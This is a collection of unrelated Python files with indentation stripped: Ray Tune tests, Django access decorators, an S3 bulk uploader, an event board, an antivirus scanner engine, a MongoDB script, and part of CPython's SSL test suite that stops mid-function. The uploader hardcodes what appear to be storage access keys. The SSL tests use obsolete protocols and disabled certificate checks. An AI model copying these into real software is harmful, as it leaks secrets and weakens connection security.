validate_save_restore(Cifar10Model, use_object_store=True)
def testPyTorchMNIST(self):
from ray.tune.examples.mnist_pytorch_trainable import TrainMNIST
from torchvision import datasets
datasets.MNIST("~/data", train=True, download=True)
validate_save_restore(TrainMNIST)
validate_save_restore(TrainMNIST, use_object_store=True)
def testHyperbandExample(self):
validate_save_restore(MyTrainableClass)
validate_save_restore(MyTrainableClass, use_object_store=True)
def testAsyncHyperbandExample(self):
validate_save_restore(MyTrainableClass)
validate_save_restore(MyTrainableClass, use_object_store=True)
class AutoInitTest(unittest.TestCase):
def testTuneRestore(self):
self.assertFalse(ray.is_initialized())
tune.run("__fake", name="TestAutoInit", stop={"training_iteration": 1})
self.assertTrue(ray.is_initialized())
def tearDown(self):
ray.shutdown()
_register_all()
class SearcherTest(unittest.TestCase):
class MockSearcher(Searcher):
def __init__(self, data):
self.data = data
def save(self, path):
with open(path, "w") as f:
f.write(self.data)
def restore(self, path):
with open(path, "r") as f:
self.data = f.read()
def testSaveRestoreDir(self):
tmpdir = tempfile.mkdtemp()
original_data = "hello-its-me"
searcher = self.MockSearcher(original_data)
searcher.save_to_dir(tmpdir)
searcher_2 = self.MockSearcher("no-its-not-me")
searcher_2.restore_from_dir(tmpdir)
assert searcher_2.data == original_data
class WorkingDirectoryTest(unittest.TestCase):
def testWorkingDir(self):
"""Trainables should know the original working dir on driver through env
variable."""
working_dir = os.getcwd()
def f(config):
assert os.environ.get("TUNE_ORIG_WORKING_DIR") == working_dir
tune.run(f)
class TrainableCrashWithFailFast(unittest.TestCase):
def test(self):
"""Trainable crashes with fail_fast flag and the original crash message
should bubble up."""
def f(config):
tune.report({"a": 1})
time.sleep(0.1)
raise RuntimeError("Error happens in trainable!!")
with self.assertRaisesRegex(RayTaskError, "Error happens in trainable!!"):
tune.run(f, fail_fast=TrialRunner.RAISE)
# For some reason, different tests are coupled through tune.registry.
# After running `ResourceExhaustedTest`, there is always a super huge `training_func` to
# be put through GCS, which will fail subsequent tests.
# tldr, make sure that this test is the last test in the file.
class ResourceExhaustedTest(unittest.TestCase):
def test_resource_exhausted_info(self):
"""This is to test if helpful information is displayed when
the objects captured in trainable/training function are too
large and RESOURCES_EXHAUSTED error of gRPC is triggered."""
# generate some random data to be captured implicitly in training func.
from sklearn.datasets import fetch_olivetti_faces
a_large_array = []
for i in range(10):
a_large_array.append(fetch_olivetti_faces())
def training_func(config):
for item in a_large_array:
assert item
with self.assertRaisesRegex(
TuneError,
"The Trainable/training function is too large for grpc resource limit.",
):
tune.run(training_func)
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__] + sys.argv[1:]))
|
decorators.py | import threading
from functools import wraps
from django.core.exceptions import PermissionDenied
def require_member(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj:
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be an active PCF controller to access this endpoint!')
return inner
def require_session(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.session.get('vatsim_data'):
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be logged in to access this endpoint!')
return inner
def require_staff(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj and request.user_obj.is_staff:
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be a staff member to access this endpoint!')
return inner
def require_mentor(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj and request.user_obj.is_mentor:
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be a mentor or instructor to access this endpoint!')
return inner
def require_staff_or_mentor(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj and (request.user_obj.is_staff or request.user_obj.is_mentor):
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be staff, mentor, or instructor to access this endpoint!')
return inner
def require_role(role_list):
def decorator(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj and request.user_obj.main_role in role_list:
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You lack the necessary role to access this endpoint!')
return inner
return decorator
def run_async(func):
@wraps(func)
def inner(*args, **kwargs):
threading.Thread(target=func, args=args).start()
return inner
|
uploadMgr.py | import scanner
from fileReader import FileReader
from s3FileUpload import S3FileUpload
from queue import Queue
import time
import os
import threading
fileQ = Queue(10000)
errorReportQ = Queue()
scanner.Scanner('c:\\python', fileQ, errorReportQ).start()
def upload():
fr = FileReader(fileQ, errorReportQ, 1024 * 1024 * 10)
fr.run()
s3 = S3FileUpload(
'us-east-1',
'RNLJDN0K03B7HHZPZTK3',
'joayaC6Gw5JfzHDoYTFWcQH0xJT94Bpb5Eroood2',
'http://192.168.68.113:9000',
'test'
)
while True:
chunk = fr.chunkQ.get()
if not chunk:
break
[data, filePath, fileSize] = chunk
# print(filePath)
key = filePath
if os.name == 'nt':
key = '/' + filePath.replace('\\', '/').replace(':', '')
s3.startFileSend(key, fileSize)
s3.sendFileData(data)
while True:
if not data:
s3.endFileSend()
break
[data, filePath, fileSize] = fr.chunkQ.get()
s3.sendFileData(data)
startTime = time.time()
threads = []
for _ in range(10):
t = threading.Thread(target=upload)
threads.append(t)
t.start()
for t in threads:
t.join()
print('All done in', round(time.time() - startTime), 'seconds') |
event_board.py | from typing import Callable
from threading import Thread
from functools import partial
from collections import defaultdict
from multiprocessing import Pipe, SimpleQueue
from pipert2.core.handlers.event_handler import EventHandler
from pipert2.utils.method_data import Method
from pipert2.utils.consts.event_names import KILL_EVENT_NAME, STOP_EVENT_NAME, START_EVENT_NAME
DEFAULT_EVENT_HANDLER_EVENTS = [START_EVENT_NAME, STOP_EVENT_NAME, KILL_EVENT_NAME]
class EventBoard:
"""The event board is responsible for managing the event system in the pipe.
"""
def __init__(self):
self.events_pipes = defaultdict(list)
self.new_events_queue = SimpleQueue()
def get_event_handler(self, events_to_listen: list):
"""Return an event handler adjusted to the given events.
Args:
events_to_listen: List of event names to listen.
Returns:
An event handler adjusted to the given events.
"""
pipe_output, pipe_input = Pipe(duplex=False)
for event_name in events_to_listen:
self.events_pipes[event_name].append(pipe_input)
for default_event_name in DEFAULT_EVENT_HANDLER_EVENTS:
self.events_pipes[default_event_name].append(pipe_input)
return EventHandler(pipe_output)
def event_loop(self):
"""Wait for new events to come and spread them to the pipes.
"""
event: Method = self.new_events_queue.get()
while event.event_name != KILL_EVENT_NAME:
for pipe in self.events_pipes[event.event_name]:
pipe.send(event)
event = self.new_events_queue.get()
# Send the kill event to the other pipes
for pipe in self.events_pipes[event.event_name]:
pipe.send(event)
def build(self):
"""Start the event loop
"""
self.event_board_thread = Thread(target=self.event_loop)
self.event_board_thread.start()
def get_event_notifier(self) -> Callable:
"""Return a callable for notifying that new event occurred
"""
def notify_event(output_event_queue, event_name, specific_flow_routines: dict = defaultdict(list), **params):
output_event_queue.put(Method(event_name, specific_flow_routines=specific_flow_routines, params=params))
return partial(notify_event, self.new_events_queue)
def notify_event(self, event_name, specific_flow_routines: dict = defaultdict(list), **params):
self.new_events_queue.put(Method(event_name=event_name,
specific_flow_routines=specific_flow_routines,
params=params))
def join(self):
self.event_board_thread.join()
|
scanner_engine.py |
from iemlav.lib.antivirus.scanner.hash_scanner import HashScanner
from iemlav.lib.antivirus.scanner.yara_scanner import YaraScanner
from iemlav.lib.antivirus.scanner.clamav_scanner import ClamAVScanner
from iemlav.lib.antivirus.antivirus_logger import AntiVirusLogger
import multiprocessing
import sys
class ScannerEngine(object):
"""ScannerEngine class."""
def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None):
# Initialize logger
self.logger = AntiVirusLogger(
__name__,
debug=debug
)
if config_path is not None:
self._CONFIG_PATH = config_path
else:
self.logger.log(
"Configuration file path not found.",
logtype="error"
)
sys.exit(0)
if file_list:
self.file_list = file_list
else:
# Initialize an empty list
self.file_list = []
# Create HashScanner object
self.hash_scanner = HashScanner(debug=debug,
config_path=self._CONFIG_PATH,
file_list=self.file_list,
vt_api_key=vt_api_key)
# Create YaraScanner object
self.yara_scanner = YaraScanner(debug=debug,
config_path=self._CONFIG_PATH,
file_list=self.file_list,
vt_api_key=vt_api_key)
# Create ClamAVScanner object
self.clamd_scanner = ClamAVScanner(debug=debug,
config_path=self._CONFIG_PATH,
file_list=self.file_list,
vt_api_key=vt_api_key)
# List of process in action
self.process_pool = []
def start_scanner_engine(self):
"""
Start the scanner engine and stat scanning
the files using three (3) engines in a multi-processing
environment.
1. Hash Scanner Engine
2. Yara Scanner Engine
3. Clam AV Scanner Engine
"""
try:
# Create Hash Scanner process
hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)
# Create Yara Scanner process
yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)
# Create Clam AV Scanner process
clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)
# Add Hash Scanner process to process list
self.process_pool.append(hash_scanner_process)
# Add Yara Scanner process to process list
self.process_pool.append(yara_scanner_process)
# Add Clamd AV process to process list
self.process_pool.append(clamd_scanner_process)
# Start Hash Scanner process
hash_scanner_process.start()
self.logger.log(
"Hash Scanner engine started",
logtype="info"
)
# Start Yara Scanner process
yara_scanner_process.start()
self.logger.log(
"Yara Scanner engine started",
logtype="info"
)
clamd_scanner_process.start()
self.logger.log(
"Clam AV Scanner engine started",
logtype="info"
)
# Complete the process
for process in self.process_pool:
process.join()
return True
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
return True
except Exception as e:
self.logger.log(
"Error occurred: " + str(e),
logtype="error"
)
return True
|
mongodb_04.py | import time
from pymongo import MongoClient
from datetime import datetime
from threading import Thread, Lock
start = datetime.now()
client = MongoClient("mongodb://username:password@127.0.0.1")
database = client["database_name"]
collection = database["collection_name"]
threads_count = 0
lock = Lock()
package = []
def send(p):
global threads_count
with lock:
threads_count += 1
collection.insert_many(p)
with lock:
threads_count -= 1
with open("utils/trash.csv") as file:
for line in file.readlines():
name, description = line.split(",")
package.append({"name": name, "description": description})
if len(package) >= 10000:
while threads_count >= 4:
time.sleep(0)
Thread(target=send, args=(package[:],), daemon=True).start()
package.clear()
if package:
collection.insert_many(package)
while threads_count != 0:
pass
print(collection.count_documents({}))
collection.drop()
client.drop_database("mongo")
print(datetime.now() - start)
|
test_ssl.py | # Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
PROTOCOLS = [
ssl.PROTOCOL_SSLv3,
ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1
]
if hasattr(ssl, 'PROTOCOL_SSLv2'):
PROTOCOLS.append(ssl.PROTOCOL_SSLv2)
HOST = support.HOST
data_file = lambda name: os.path.join(os.path.dirname(__file__), name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
SVN_PYTHON_ORG_ROOT_CERT = data_file("https_svn_python_org_root.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
#ssl.PROTOCOL_SSLv2
ssl.PROTOCOL_SSLv23
ssl.PROTOCOL_SSLv3
ssl.PROTOCOL_TLSv1
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
self.assertIn(ssl.HAS_SNI, {True, False})
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['notAfter'], 'Oct 5 23:01:56 2020 GMT')
self.assertEqual(p['notBefore'], 'Oct 8 23:01:56 2010 GMT')
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
def test_DER_to_PEM(self):
with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 2.0
self.assertLess(n, 0x20000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 2)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 26)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by OpenSSL, the format might change
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# socket.error raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
ss = ssl.wrap_socket(s)
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
s = ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(IOError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
ok(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv2)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv3)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL is the default value
self.assertEqual(ssl.OP_ALL, ctx.options)
ctx.options |= ssl.OP_NO_SSLv2
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2,
ctx.options)
ctx.options |= ssl.OP_NO_SSLv3
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(IOError) as cm:
ctx.load_cert_chain(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(SVN_PYTHON_ORG_ROOT_CERT, ONLYKEY)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None)
with self.assertRaises(IOError) as cm:
ctx.load_verify_locations(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect(("svn.python.org", 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
s.connect(("svn.python.org", 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex(('svn.python.org', 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLError as err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([s], [], [], 5.0)
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [s], [], 5.0)
else:
raise
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex(('svn.python.org', 443))
if rc == 0:
self.skipTest("svn.python.org responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(errno.ECONNREFUSED,
s.connect_ex(("svn.python.org", 444)))
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet("svn.python.org"):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
